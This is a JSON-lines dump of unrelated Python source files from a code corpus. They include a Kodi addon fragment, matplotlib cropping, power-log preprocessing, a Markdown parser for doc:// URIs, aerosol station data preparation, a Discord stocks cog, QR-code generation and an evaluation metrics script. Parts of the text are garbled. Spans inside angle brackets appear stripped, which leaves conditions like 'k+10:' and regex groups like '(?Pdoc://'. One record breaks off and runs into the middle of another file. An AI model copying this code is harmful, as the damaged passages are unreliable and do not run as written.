re.sub(r'\\<[^)].*?\\>', '', str(episode['summary'])).replace(\"&\",\"&\").replace(\"\\t\",\"\")\n if episode['image']: info['poster'] = episode['image']['original']\n info['fanart'] = get_background_path()\n return info\n\ndef item_images(type, tmdb_id=None, imdb_id=None, tvdb_id=None, name=None):\n poster = \"\"\n fanart = \"\"\n response = \"\"\n if not tmdb_id and not imdb_id and not tvdb_id and not tvrage_id and not name: return None\n if type == \"movie\" and tmdb_id != None and tmdb_id != \"\": response = tmdb.Movies(tmdb_id).info()\n elif type == \"tv\" and tmdb_id != None and tmdb_id != \"\": response = tmdb.TV(tmdb_id).info()\n elif type == \"tv\" and tvdb_id != None and tvdb_id != \"\": response = tmdb.Find(tvdb_id).info(external_source=\"imdb_id\")\n elif imdb_id != None and imdb_id != \"\": response = tmdb.Find(imdb_id).info(external_source=\"imdb_id\")\n if response == \"\": return False\n if tmdb_id == None:\n if type == \"movie\" : response = response.get(\"movie_results\")\n elif type == \"tv\" : response = response.get(\"tv_results\")\n elif type == \"season\" : response = response.get(\"season_results\")\n elif type == \"episode\": response = response.get(\"episode_results\")\n if isinstance(response, dict):\n if response.get(\"backdrop_path\"): fanart = \"http://image.tmdb.org/t/p/w1280/%s\" % response.get(\"backdrop_path\")\n else : fanart = \"special://home/addons/script.qlickplay/fanart.jpg\"\n if response.get(\"poster_path\") : poster = \"http://image.tmdb.org/t/p/w500/%s\" % response.get(\"poster_path\")\n else : poster = \"special://home/addons/script.qlickplay/icon.png\"\n elif isinstance(response, list):\n if response[\"backdrop_path\"]: fanart = \"http://image.tmdb.org/t/p/w1280/%s\" % response[\"backdrop_path\"]\n else : fanart = \"special://home/addons/script.qlickplay/fanart.jpg\"\n if response[\"poster_path\"] : poster = \"http://image.tmdb.org/t/p/w500/%s\" % response[\"poster_path\"]\n else : poster = \"special://home/addons/script.qlickplay/icon.png\"\n images = [poster, fanart]\n return images \n","sub_path":"plugin.video.metalliq/resources/lib/meta/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":13193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"563628854","text":"import matplotlib.image as img\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport scipy.misc as misc\nfrom read_files import read\n\nimages = read() # sedov, quad, bubble, rt\ncropped_imgs = []\nimg_titles = ['compressible', 'compressible_rk', 'compressible_fv4']\npng_names = ['sedov.png', 'sedov_rk.png', 'sedov_fv4.png', 'quad.png', 'quad_rk.png', 'quad_fv4.png', 'bubble.png', 'bubble_rk.png', 'bubble_fv4.png', 'rt.png', 'rt_rk.png', 'rt_fv4.png']\n\nplt.gca().set_axis_off()\nplt.subplots_adjust(top=1, bottom=0, right=1, left=0, hspace=0, wspace=0)\nplt.margins(0,0)\nplt.gca().xaxis.set_major_locator(ticker.NullLocator())\nplt.gca().yaxis.set_major_locator(ticker.NullLocator())\n\nfor list in images[:2]:\n for im in list:\n cropped_im = im[20:450, 160:650, :]\n cropped_imgs.append(cropped_im)\nfor list in images[2:3]:\n for im in list:\n cropped_im = im[20:450, 240:590, :]\n cropped_imgs.append(cropped_im)\nfor list in images[3:]:\n for im in list:\n cropped_im = im[80:390, 50:750, :]\n cropped_imgs.append(cropped_im)\n\nfor n, im in enumerate(cropped_imgs):\n plt.gca().set_axis_off()\n plt.subplots_adjust(top=1, bottom=0, right=1, left=0, hspace=0, wspace=0)\n plt.margins(0,0)\n plt.gca().xaxis.set_major_locator(ticker.NullLocator())\n plt.gca().yaxis.set_major_locator(ticker.NullLocator())#\n plt.imshow(im)\n if n < 6:\n plt.text(245, 3, img_titles[n%3], horizontalalignment='center',\n verticalalignment='top')\n plt.savefig(png_names[n], dpi=90, bbox_inches='tight', pad_inches=0)\n plt.gcf().clear()\n elif n >=6 and n < 9:\n plt.text(175, 3, img_titles[n%3], horizontalalignment='center',\n verticalalignment='top')\n plt.savefig(png_names[n], dpi=90, bbox_inches='tight', pad_inches=0)\n plt.gcf().clear()\n else:\n plt.text(350, 3, img_titles[n%3], horizontalalignment='center',\n verticalalignment='top')\n plt.savefig(png_names[n], dpi=110, bbox_inches='tight', pad_inches=0)\n plt.gcf().clear()\n \n\n#plt.imshow(cropped_imgs[2])\n#plt.savefig('sedov_fv.png', bbox_inches='tight', pad_inches=0)\n#plt.show()\n","sub_path":"changed_files/pngs/crop2.py","file_name":"crop2.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"619115053","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\nfrom utility import *\nfrom copy import*\n\n\n# In[ ]:\n\n#path_str = \"../../../../Dropbox/project_006/data/boelter_to_kfc/\"\n#path_str = \"../../../../Dropbox/project_006/data/kfc_to_boelter/\"\n#path_str = \"../../../../Dropbox/project_006/data/\"\n#datetime = \"20160502_230328\"\n\n\n# In[ ]:\n\n# the base power consumption 411\n#raw = np.loadtxt(\"../../../../Dropbox/project_006/data/power_base.TXT\", delimiter=',')\n#base_current = [ v[2] for v in raw ]\n#base_power = [ v * 3.7 for v in base_current ]\n#np.mean(base_power), np.std(base_power)\n\n\n# In[2]:\n\ndef preprocess(path_str, datetime, time_unit):\n ''' \n The raw samples are every 0.5 seconds\n Time unit measured in number of samples\n Returns time_unit\n '''\n\n network_record = np.loadtxt(path_str + \"bw_\" + datetime + '.txt', delimiter=',', dtype='str')\n\n rssi = [int(v[1]) for v in network_record]\n bandwidth = [ 0 if v[4] == '' else float(v[4]) for v in network_record]\n cellloc = [v[2:3] for v in network_record]\n\n rssi_cell = []\n prev_cell = cellloc[0]\n rc_x = []\n rc_y = []\n for i in range(len(rssi)):\n if cellloc[i] == prev_cell:\n rc_x.append(i)\n rc_y.append(rssi[i])\n else:\n rssi_cell.append([copy(rc_x), copy(rc_y)])\n rc_x = [i]\n rc_y = [rssi[i]]\n prev_cell = cellloc[i]\n rssi_cell.append([copy(rc_x), copy(rc_y)])\n\n # Remove weird points\n bandwidth = [ bandwidth[i-1] if bandwidth[i] > 1e7 else bandwidth[i] for i in range(len(bandwidth)) ]\n\n current_record = np.loadtxt(path_str + \"power_\" + datetime + '.TXT', delimiter=',')\n\n window = 500000\n prev_time = current_record[0][0]\n current = []\n rec_buffer = []\n\n cnt = 0\n for rec in current_record:\n curr_time = rec[0]\n # deal with cases where multiple records are missing\n if curr_time - prev_time > window:\n current_avg = np.mean(rec_buffer)\n rec_buffer = [rec[2]]\n while curr_time - prev_time > window:\n current.append(current_avg)\n curr_time -= window\n prev_time = rec[0] - int(curr_time) % int(window)\n cnt += 1\n else:\n rec_buffer += [rec[2]]\n power = [ i * 3.7 - 411 for i in current ]\n energy = [ p * 0.5 * 1e-3 for p in power ] \n \n # adjust the readings and find the most correlated point. The network is always ahead of \n max_cor = -1\n max_idx = 0\n for i in range(20):\n maxlen = min(len(bandwidth[i:]), len(energy))\n cor = np.corrcoef(bandwidth[i:i + maxlen], energy[:maxlen])[0][1]\n if cor > max_cor:\n max_cor = cor\n max_idx = i\n maxlen = min(len(bandwidth[i:]), len(energy))\n \n return Network(bandwidth=bandwidth[i:i+maxlen], energy=energy[:maxlen], rssi=rssi[i:i+maxlen], time_unit=time_unit)\n #return rssi[i:i + maxlen], bandwidth[i:i + maxlen], cellloc[i:i + maxlen], power[:maxlen]\n\n\n# In[3]:\n\npath_str = \"../../../../Dropbox/project_006/data/b2k/\"\ndatetime = \"20160502_223631\"\nnw = preprocess(path_str, datetime, 1.0)\n\n\n# In[ ]:\n\n\n\n","sub_path":"src/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"645291742","text":"# Run with Python 3\n# Copyright 2019 VMware, Inc.\n# SPDX-License-Identifier: BSD-2-Clause\n\"\"\"\\\nMarkdown with doc:// URI resolution. Part of the Doctor documentation tool.\nNo standalone capability.\n\"\"\"\n# Exit if run other than as a module.\nif __name__ == '__main__':\n print(__doc__)\n raise SystemExit(1)\n\n#\n# Standard library imports, in alphabetic order.\n#\n# JSON module. Only used for verbose diagnostic output.\n# https://docs.python.org/3/library/json.html\nimport json\n#\n# File path module.\n# https://docs.python.org/3/library/os.path.html\nimport os.path\n#\n# Regular expressions module.\n# https://docs.python.org/3/library/re.html\nimport re\n#\n# Module for manipulation of the import path.\n# https://docs.python.org/3/library/sys.html#sys.path\nimport sys\n#\n# Local imports\n#\n# Module with Comment Block, to which this module adds Markdown items.\nfrom doctor.comment_block import CommentBlock\n#\n# Module with a handy RE access utility.\nfrom doctor.comment_line import CommentLine\n#\n# Module for Markdown semantic items.\nfrom doctor.markdown import BlockType, SpanType, MarkdownItem\n#\n# Markdown parser module.\n# https://github.com/lepture/mistune\nimport mistune\n# Sorry, you have to ensure that your local copy of the mistune repository has\n# been added to sys.path before importing the doctor package. There is a\n# subroutine to do that in the doctor.py script.\n\n# The DocResolver is in its own class to keep the mistune.Renderer subclass\n# tidy. It only has class constants and class methods.\nclass DocResolver:\n blockContain = {\n BlockType.PARAGRAPH.name: {\n 'can': tuple(SpanType),\n 'cannot': tuple(BlockType)\n },\n BlockType.HEADER.name: {\n 'can': tuple(SpanType),\n 'cannot': tuple(BlockType)\n },\n BlockType.LIST_ITEM.name: {\n 'can': tuple(SpanType) + (BlockType.LIST, BlockType.PARAGRAPH),\n 'cannot': (BlockType.LIST_ITEM,)\n }\n }\n \n # Constant regular expressions get compiled here. See CommentLine class for\n # short discussion.\n #\n # Following syntax elements are used:\n #\n # - Python r'...' for raw strings that don't get backslash expansion.\n # - (?:...) for non-capture group.\n # - \\s matches end-of-line characters, because they are whitespace.\n # \\s+ requires at least one, which means that it doesn't match at the\n # very start of a string, which is what's wanted here.\n # - Caret in a capture group doesn't capture the newline characters, and\n # dollar doesn't either if they precede the pattern.\n # - Python string continuation, some having comments in between.\n #\n # Next pattern is used to split a text with embedded at commands.\n atPattern = re.compile(\n r'\\s+(^@(?:'\n r'returns?' # \"return\" or \"returns\".\n r'|' # Alternate matches separated by pipe character.\n r'param'\n r'|'\n r'brief'\n r'|'\n r'description'\n r'|'\n r'details'\n r'|'\n r'version'\n r'))', re.MULTILINE)\n\n @classmethod\n def can_contain(cls, blockType, markdownItem):\n try:\n if markdownItem.type in cls.blockContain[blockType.name]['can']:\n return True\n if markdownItem.type in cls.blockContain[blockType.name]['cannot']:\n return False\n except Exception as exception:\n raise exception.__class__(\n 'Block contain configuration incomplete for {} and {}.'.format(\n blockType.name, markdownItem.type.name)) from exception\n \n raise AssertionError(\n \"Don't know if {} can or cannot contain {}.\".format(\n blockType.name, markdownItem))\n\n @classmethod\n def resolve_all_doc_uri(cls, blockType, text, custom=None):\n output = []\n outputTail = None\n for child in text:\n if child.blockType is BlockType.DOC_URI:\n for grandchild in child.contents:\n if cls.can_contain(blockType, grandchild):\n if outputTail is None:\n outputTail = []\n outputTail.append(grandchild)\n else:\n if outputTail is not None:\n output.append(MarkdownItem(\n blockType, None, outputTail, custom))\n outputTail = None\n output.append(grandchild)\n else:\n if outputTail is None:\n outputTail = []\n outputTail.append(child)\n \n if outputTail is not None:\n output.append(MarkdownItem(blockType, None, outputTail, custom))\n \n return output\n \n @classmethod\n def process_at_commands(cls, iterator):\n \"\"\"\\\n Take an iterator of paragraphs and split each to ensure that any\n at-commands are at the start of a paragraph. Also:\n \n - Join adjacent texts, to prevent wrong handling of parameter names\n with embedded _ characters later.\n - Strip leading whitespace from every line after the first in each\n paragraph.\n \"\"\"\n # Splitting is necessary if there is an embedded newline-at in a text\n # item that is a direct child of the paragraph.\n\n for paragraph in iterator:\n \n # Don't attempt to resolve at commands in code blocks.\n if paragraph.blockType is BlockType.BLOCK_CODE:\n yield paragraph\n continue\n # Unresolved at this time is that non-paragraphs sometimes come\n # through here, like lists also come through here. It seems to be OK\n # though, because those could have at commands that need to be\n # resolved.\n\n # Start a list of Markdown items that will become child items in the\n # yielded paragraphs.\n contents = []\n\n for span in cls.consolidate_texts(paragraph.contents):\n if span.spanType is not SpanType.TEXT:\n contents.append(span)\n continue\n\n if not isinstance(span.contents, str):\n raise AssertionError(\n \"Text in paragraph contents aren't str.\")\n \n # The following returns a list with an odd number of items,\n # because the pattern has a capture group.\n splits = re.split(cls.atPattern, \"\".join(tuple(\n # Strip any leading whitespace from lines after the first.\n (line if lineIndex <= 0 else line.lstrip())\n for lineIndex, line in enumerate(\n span.contents.splitlines(True))\n )))\n\n # Following lines are handy to check what's coming out of the re\n # split.\n # for index, split in enumerate(splits):\n # print('{:>02d} \"{}\"'.format(index, split))\n\n # Note that splits never has an even number of items. If splits\n # has one item, this loop runs zero times.\n for splitIndex in range(0, len(splits) - 2, 2):\n if not(splits[splitIndex] == \"\" and splitIndex == 0):\n contents.append(MarkdownItem(\n None, SpanType.TEXT\n , splits[splitIndex] if splitIndex <= 0\n else ''.join(splits[splitIndex - 1: splitIndex + 1])\n ))\n yield MarkdownItem(\n paragraph.blockType, None, contents, paragraph.custom)\n contents = []\n \n # Sweep up the items that weren't processed by the loop, either\n # one or two items.\n contents.append(MarkdownItem(\n None, SpanType.TEXT, ''.join(splits[-2:])))\n \n yield MarkdownItem(\n paragraph.blockType, None, contents, paragraph.custom)\n \n @classmethod\n def consolidate_texts(cls, iterator):\n pending = None\n contents = None\n \n for span in iterator:\n if not isinstance(span, MarkdownItem):\n raise AssertionError(\"Item in text consolidation isn't\"\n \" MarkdownItem: {}\".format(type(span)))\n \n if span.spanType is SpanType.TEXT:\n if contents is None and pending is None:\n pending = span\n else:\n if contents is None:\n contents = []\n if pending is not None:\n contents.append(pending.contents)\n pending = None\n contents.append(span.contents)\n else:\n if pending is not None:\n yield pending\n pending = None\n if contents is not None:\n yield MarkdownItem(None, SpanType.TEXT, ''.join(contents))\n contents = None\n yield span\n \n if pending is not None:\n yield pending\n pending = None\n if contents is not None:\n yield MarkdownItem(None, SpanType.TEXT, ''.join(contents))\n contents = None\n\nclass DocRenderer(mistune.Renderer):\n \n docPath = None\n \n def __init__(self, docGetter, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.verbose = False\n self.docGetter = docGetter\n \n def doc_uri(self, groups):\n name, uri = CommentLine.group_startswith(groups, 'doc')\n if self.verbose:\n print('DocRenderer doc_uri', groups, name)\n \n contentLines = self.docGetter.get_content(uri, self.docPath)\n content = ''.join(contentLines)\n if content == \"\":\n return []\n\n markdownItems = MarkdownParser(self.docGetter).get_markdown_items(\n self.docPath, content)\n\n # If len(contentLines) is 1 then destructure the markdown() return\n # value, i.e. remove the paragraph layer.\n if len(contentLines) == 1:\n if markdownItems[0].type is BlockType.PARAGRAPH:\n markdownItems = markdownItems[0].contents\n else:\n raise NotImplementedError()\n\n return [MarkdownItem(BlockType.DOC_URI, None ,markdownItems)]\n\n #\n # Block item overrides.\n #\n # Same order as here: https://github.com/lepture/mistune#block-level\n def block_code(self, code, language=None):\n if self.verbose:\n print('DocRenderer block_code(,{},{})'.format(code, language))\n return [MarkdownItem(BlockType.BLOCK_CODE, None, code)]\n\n def block_quote(self, text):\n raise NotImplementedError()\n def block_html(self, html):\n raise NotImplementedError()\n\n def header(self, text, level, raw=None):\n if self.verbose:\n print('DocRenderer header(,{},{},{})'.format(text, level, raw))\n return DocResolver.resolve_all_doc_uri(\n BlockType.HEADER, text, {'level': level})\n \n def hrule(self):\n raise NotImplementedError()\n\n def list(self, body, ordered=True):\n if self.verbose:\n print('DocRenderer list(,\\n{}\\n,{})'.format(body, ordered))\n return DocResolver.resolve_all_doc_uri(\n BlockType.LIST, body, {'ordered': ordered})\n\n def list_item(self, text):\n if self.verbose:\n print('DocRenderer list_item(,{})'.format(text))\n return DocResolver.resolve_all_doc_uri(BlockType.LIST_ITEM, text)\n\n def paragraph(self, text):\n resolved = DocResolver.resolve_all_doc_uri(BlockType.PARAGRAPH, text)\n outputs = [output\n for output in DocResolver.process_at_commands(resolved)]\n if self.verbose:\n def json_dump(iterator, indent=4):\n return json.dumps(tuple(\n item.asTuple() for item in iterator), indent=4)\n print('DocRenderer paragraph(,\\n{})\\nresolved{}\\noutputs{}'.format(\n text, json_dump(resolved), json_dump(outputs)))\n return outputs\n\n def table(self, header, body):\n raise NotImplementedError()\n def table_row(self, content):\n raise NotImplementedError()\n def table_cell(self, content, **flags):\n raise NotImplementedError()\n \n #\n # Span item overrides.\n #\n # Same order as here: https://github.com/lepture/mistune#span-level\n def autolink(self, link, is_email=False):\n if self.verbose:\n print('DocRenderer autolink(,{},{})'.format(link, is_email))\n return [MarkdownItem(None, SpanType.AUTOLINK, link)]\n def codespan(self, text):\n if self.verbose:\n print('DocRenderer codespan(,\\n{})'.format(text))\n return [MarkdownItem(None, SpanType.CODESPAN, text)]\n def double_emphasis(self, text):\n if self.verbose:\n print('DocRenderer double_emphasis(,\\n{})'.format(text))\n return [MarkdownItem(None, SpanType.DOUBLE_EMPHASIS, text)]\n def emphasis(self, text):\n if self.verbose:\n print('DocRenderer emphasis(,\\n{})'.format(text))\n return [MarkdownItem(None, SpanType.EMPHASIS, text)]\n def image(self, src, title, alt_text):\n raise NotImplementedError()\n def linebreak(self):\n raise NotImplementedError()\n def newline(self):\n if self.verbose:\n print('DocRenderer newline(,)')\n # return [MarkdownItem(None, SpanType.NEWLINE, \"\")]\n # Previous line would perserve the newline, which might in turn enable\n # perfect reconstruction of the input. Perfect reconstruction isn't\n # possible at time of writing, in some cases. For example, this list:\n #\n # - Just a list.\n #\n # Nothing to see.\n # - Middle of the list.\n #\n # The Doctor adds a blank link after 'Nothing to see', which seems\n # tidier and more consistent. So these newline occurrences aren't\n # preserved for now.\n return []\n def link(link, title, content):\n raise NotImplementedError()\n def strikethrough(self, text):\n raise NotImplementedError()\n def text(self, text):\n if self.verbose:\n print('DocRenderer text(,{}\\n{})'.format(len(text), text))\n return [MarkdownItem(None, SpanType.TEXT, text)]\n def inline_html(self, text):\n if self.verbose:\n print('DocRenderer inline_html(,\\n{})'.format(text))\n return [MarkdownItem(None, SpanType.INLINE_HTML, text)]\n\n #\n # Other overrides.\n #\n def placeholder(self):\n return []\n\nclass DocInlineGrammar(mistune.InlineGrammar):\n def __init__(self):\n super().__init__()\n # Mistune uses `match` not `search`, so it only consumes at the start.\n # It might be possible to fix it. Might. For now, doc: URIs can only be\n # at the start of a lexical doodad, or enclosed in brackets.\n pattern = self.text.pattern.replace('https?', '(?:http|https|doc)')\n self.text = re.compile(pattern)\n\nclass DocInlineLexer(mistune.InlineLexer):\n def enable_doc_uri(self):\n # add rules. Regular expressions here use the Python `r` raw string\n # syntax.\n self.rules.doc_uri = re.compile(\n r'(?:'\n r'(?Pdoc://\\S*)'\n r'|'\n r'(\\[)(\\s*)(?Pdoc://[^\\]\\s]*)(\\s*)(\\])'\n r')'\n )\n self.default_rules.insert(1, 'doc_uri')\n\n def output_doc_uri(self, match):\n return self.renderer.doc_uri(match.groupdict())\n\nclass MarkdownParser:\n # Not enjoying the implementation of docPath in this class. It's needed in\n # order to resolve relative doc: URIs but it's unclear how best to do it.\n\n # @property\n # def docPath(self):\n # return self._renderer.docPath\n # @docPath.setter\n # def docPath(self, docPath):\n # self._renderer.docPath = docPath\n # \n def __init__(self, docGetter):\n self._renderer = DocRenderer(docGetter)\n inlineLexer = DocInlineLexer(self._renderer)\n inlineLexer.enable_doc_uri()\n self._markdown = mistune.Markdown(\n renderer=self._renderer, inline=inlineLexer\n , rules=DocInlineGrammar())\n \n def get_markdown_items(self, docPath, *args, **kwargs):\n self._renderer.docPath = docPath\n # Uncomment the following line to get a lot of render dump.\n # self._renderer.verbose = True\n return self._markdown(*args, **kwargs)\n \n def read(self, iterator, sourcePath):\n for item in iterator:\n if isinstance(item, CommentBlock):\n try:\n item.markdownItems = self.get_markdown_items(\n sourcePath, \"\".join(item.get_texts()))\n except Exception as exception:\n raise exception.__class__(\n 'Error getting Markdown items. Block:{}.'.format(item)\n ) from exception\n yield item\n","sub_path":"doctor/doc_markdown.py","file_name":"doc_markdown.py","file_ext":"py","file_size_in_byte":17377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"351421035","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 10 10:30:44 2021\r\n\r\n@author: Anindita\r\n\"\"\"\r\n\r\ninp=input(\"Enter the string: \")\r\nwhile(len(inp)!=8):\r\n print('please enter 8 character string.')\r\n inp=input()\r\nk=''.join(format(ord(i), '08b') for i in inp)\r\narr1=[]\r\nn=len(k)\r\nfor i in range(n):\r\n if((i+1)%8!=0):\r\n arr1.append(k[i])\r\n \r\nprint(arr1) \r\nprint(\"Length of string after discarding:\",len(arr1))","sub_path":"Advance Communication and TCP_IP/1_des.py","file_name":"1_des.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"188617685","text":"#!/usr/bin/python3.2\n#prepare files from Asmi dataset\n\npath = '/lustre/storeB/project/aerocom/aerocom1/AEROCOM_OBSDATA/Export/GAW_ACTRIS/'\nparam = 'NC'\n\n#required modules\nimport numpy as np\nfrom scipy.stats import nanmean\nfrom scipy.stats import kendalltau\nfrom scipy.stats.mstats import theilslopes\nimport time\nfrom datetime import datetime\n\n#Stations-definition reading file\nimport csv\nreadCSV = csv.reader(open(path+'/'+'Stations.txt'), delimiter='\\t')\n#init\ni = 0\ncode, station, lat, lon = [], [], [], []\nfor row in readCSV:\n\tif(i>=1):\n\t\tcode.append(row[0])\n\t\tstation.append(row[1])\n\t\tlat.append(row[2])\n\t\tlon.append(row[3])\n\ti=i+1\t\n\n#list of files for parameter\nimport glob\nlistfile=sorted(glob.glob(path + '/' + \"*.dat\"))\n# * * * * * * * * * * * * * * * * * * * * * * * *\n#reduce list of code - coo to list of stations available for parameter\ncodeok, stationok, latok, lonok, = [], [], [], []\ni=0\nfor c in code:\n\tfor f in listfile:\n\t\tif (c in f):\n\t\t\tcodeok.append(code[i])\n\t\t\tstationok.append(station[i])\n\t\t\tlatok.append(lat[i])\n\t\t\tlonok.append(lon[i])\n\ti = i + 1\n# * * * * * * * * * * * * * * * * * * * * * * * *\n\n#for the different sites, create formatted file\ni=0\nfor f in listfile:\n\tprint('****' + codeok[i]+' - '+f + '****')\n\t# initialization\n\tods, year, month, day, data = [], [], [], [], []\n\tfrom datetime import date\n\treadCSV = csv.reader(open(f), delimiter='\\t')\n\tfor row in readCSV:\n\t\tif (codeok[i]=='DMPSMPZ' or codeok[i]=='DMPSPAL' or codeok[i]=='DMPSSMR' or codeok[i]=='DMPSVAR' or codeok[i]=='DMPSVHL'):\n\t\t\ttim, dat, dat2, dat3, flag=row[0].split()\n\t\t\tif (float(flag)==1):\n\t\t\t\ttim=int(np.floor(float(tim)))\n\t\t\t\ttime=date.fromordinal(tim)\n\t\t\t\tt=time.timetuple()\n\t\t\t\tyear.append(t[0])\n\t\t\t\tmonth.append(t[1])\n\t\t\t\tday.append(t[2])\n\t\t\t\tdata.append(dat)\n\t\t\t\tods.append(tim)\n\t\telse:\n\t\t\ttim, dat, flag=row[0].split()\n\t\t\tif (float(flag)==1):\n\t\t\t\ttim=int(np.floor(float(tim)))\n\t\t\t\ttime=date.fromordinal(tim)\n\t\t\t\tt=time.timetuple()\n\t\t\t\tyear.append(t[0])\n\t\t\t\tmonth.append(t[1])\n\t\t\t\tday.append(t[2])\n\t\t\t\tdata.append(dat)\n\t\t\t\tods.append(tim)\n\t\n\n\t#unique ordinal days\n\todays,uidx=np.unique(ods,return_index=True)\n\n\t#for each unique oday, average data\n\tj=0\n\tokyear, okmonth, okday, okdata = [], [], [], []\n\tfor uod in odays: # for the unique odays\n\t\tavg_data=[]\n\t\tk=uidx[j] #start from this index\n\t\twhile(ods[k]==uod and k+10:\n\t\t\tokdata.append(sum(avg_data)/len(avg_data))\n\t\t\tokday.append(day[k-1])\n\t\t\tokmonth.append(month[k-1])\n\t\t\tokyear.append(year[k-1])\n\t\tj=j+1\n\n\t#write of the file\n\toutfile=param+'_daily_' + stationok[i] + '.txt'\n\tf = open(path + '/' + outfile, 'w')\n\tprint(path + '/' + outfile)\n\n\t#header \n\tf.write('12'+'\\n')\n\tf.write('Latitude:'+'\\t'+latok[i]+'\\n')\n\tf.write('Longitude:'+'\\t'+lonok[i]+'\\n')\n\tf.write('Altitude:'+'\\t'+str(np.nan)+'\\n')\n\tf.write('Station name:'+'\\t'+stationok[i]+'\\n')\n\tf.write('\\n')\n\tf.write('\\n')\n\tf.write('\\n')\n\tf.write('\\n')\n\tf.write('\\n')\n\tf.write('datestring'+'\\t'+'year'+'\\t'+'month'+'\\t'+'day'+'\\t'+'hour'+'\\t'+'minute'+'\\t'+'second'+'\\t'+'value'+'\\n')\n\tk=0\n\twhile k= so.get(stock)[2]:\n stockOwners.append(name)\n # print(\" stock {}: {}\".format(k, v))\n\n # get time left\n if stock == \"tcb\":\n timeLeft[name] = req.get('city_bank', dict({})).get(\"time_left\", 0)\n elif stock == \"wssb\":\n timeLeft[name] = req.get('education_timeleft', 0)\n\n return timeLeft, stockOwners\n\n @commands.command()\n async def wssb(self, ctx):\n \"\"\"Display information for the WSSB sharing group.\"\"\"\n\n timeLeft, stockOwners = await self.get_times(ctx, stock=\"wssb\")\n if len(timeLeft):\n lst = \"{: <15} | {} | {} \\n\".format(\"NAME\", \"EDU TIME LEFT\", \"WSSB\")\n lst += \"-\" * (len(lst) - 1) + \"\\n\"\n\n for k, v in sorted(timeLeft.items(), key=lambda x: x[1]):\n lst += \"{: <15} | {} | {} \\n\".format(k, fmt.s_to_dhm(v), \"x\" if k in stockOwners else \" \")\n\n await ctx.send(f\"Here you go {ctx.author.display_name}, the list of education time left and WSSB owners:\\n```\\n{lst}```\")\n\n @commands.command()\n async def tcb(self, ctx):\n \"\"\"Display information for the TCB sharing group.\"\"\"\n\n timeLeft, stockOwners = await self.get_times(ctx, stock=\"tcb\")\n\n if len(timeLeft):\n lst = \"{: <15} | {} | {} \\n\".format(\"NAME\", \"INV TIME LEFT\", \"TCB\")\n lst += \"-\" * (len(lst) - 1) + \"\\n\"\n\n for k, v in sorted(timeLeft.items(), key=lambda x: x[1]):\n lst += \"{: <15} | {} | {} \\n\".format(k, fmt.s_to_dhm(v), \"x\" if k in stockOwners else \" \")\n\n await ctx.send(f\"Here you go {ctx.author.display_name}, the list of investment time left and TCB owners:\\n```\\n{lst}```\")\n","sub_path":"cogs/stocks.py","file_name":"stocks.py","file_ext":"py","file_size_in_byte":7704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483778363","text":"# In order for the following code to run, couple dependent libraries\n# need to be installed.\n# Do command:\n# sudo pip install pypng\n# sudo apt-get install libpng-dev\n# sudo apt-get install zlib1g-dev\nimport pyqrcode\nimport sys\nfrom PIL import Image\nqr = pyqrcode.create(sys.argv[1])\nqr.png(sys.argv[2], scale=6)\nim = Image.open(sys.argv[2])\nrgb_im = im.convert('RGB')\nrgb_im.save(sys.argv[2])\ndef generate_qrcode(input_string,out_filename):\n code = pyqrcode.create(input_string)\n code.png(out_filename, scale = 6)\n im = Image.open(out_filename)\n rgb_im = im.convert('RGB')\n rgb_im.save(out_filename)\n","sub_path":"code/Computer Vision/generate_qrcode.py","file_name":"generate_qrcode.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"423708132","text":"\"\"\"\n Testing perfomance on dataset provided by Kiritchenko et al (Exact)\n\n PMIDS_INFO --> {pmid: (True_N, Pred_N), ...}\n\"\"\"\n\nimport csv\nimport os\n\ncwd = os.getcwd()\n\n\nPMIDS = []\nPMIDS_INFO = {}\n\ndef get_true():\n \"\"\"\n True data\n \"\"\"\n path = os.path.join(cwd, 'exact_N_true.csv')\n with open(path, \"r\") as csv_file:\n csv_reader = csv.reader(csv_file)\n for row in csv_reader:\n pmid = row[0]\n N = row[1]\n if pmid.isnumeric() and N.isnumeric():\n PMIDS.append(pmid)\n PMIDS_INFO[pmid] = N\n csv_file.close()\n print(len(PMIDS_INFO))\n\ndef get_predicted():\n path = os.path.join(cwd, 'output', 'evidence_table.csv')\n with open(path, \"r\") as csv_file:\n csv_reader = csv.reader(csv_file)\n for row in csv_reader:\n pmid = row[0]\n pred_n = row[1]\n if pmid.isnumeric() and (pmid in PMIDS):\n true_n = PMIDS_INFO[pmid]\n PMIDS_INFO[pmid] = (true_n, pred_n)\n csv_file.close()\n\n print(len(PMIDS_INFO))\n\nget_true()\nget_predicted()\n\ncorrect = 0\npredictions_made = 0\nfor key, value in PMIDS_INFO.items():\n if value[1].isnumeric():\n predictions_made += 1\n if value[0] == value[1]:\n correct += 1\n\nprecision = correct / predictions_made\nrecall = correct / len(PMIDS_INFO)\nf1 = 2*((precision*recall)/(precision+recall))\n\nprint('\\nN:', len(PMIDS))\n\nprint('Sample Size extraction from {} articles\\n'.format(len(PMIDS)))\n\nprint('System developed by Kiritchenko et al: \\n\\tRecall:\\t 0.56 ')\n\nprint('\\nbi-LSTM-CRF adapted for Sample Size extraction:')\nprint('\\tPrecision: {:03.2f}'.format(precision))\nprint('\\tRecall:\\t {:03.2f}'.format(recall))\nprint('\\tF1:\\t {:03.2f}'.format(f1))\n\n\n\n\n","sub_path":"lstm/exact/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"337774477","text":"#!/usr/bin/env 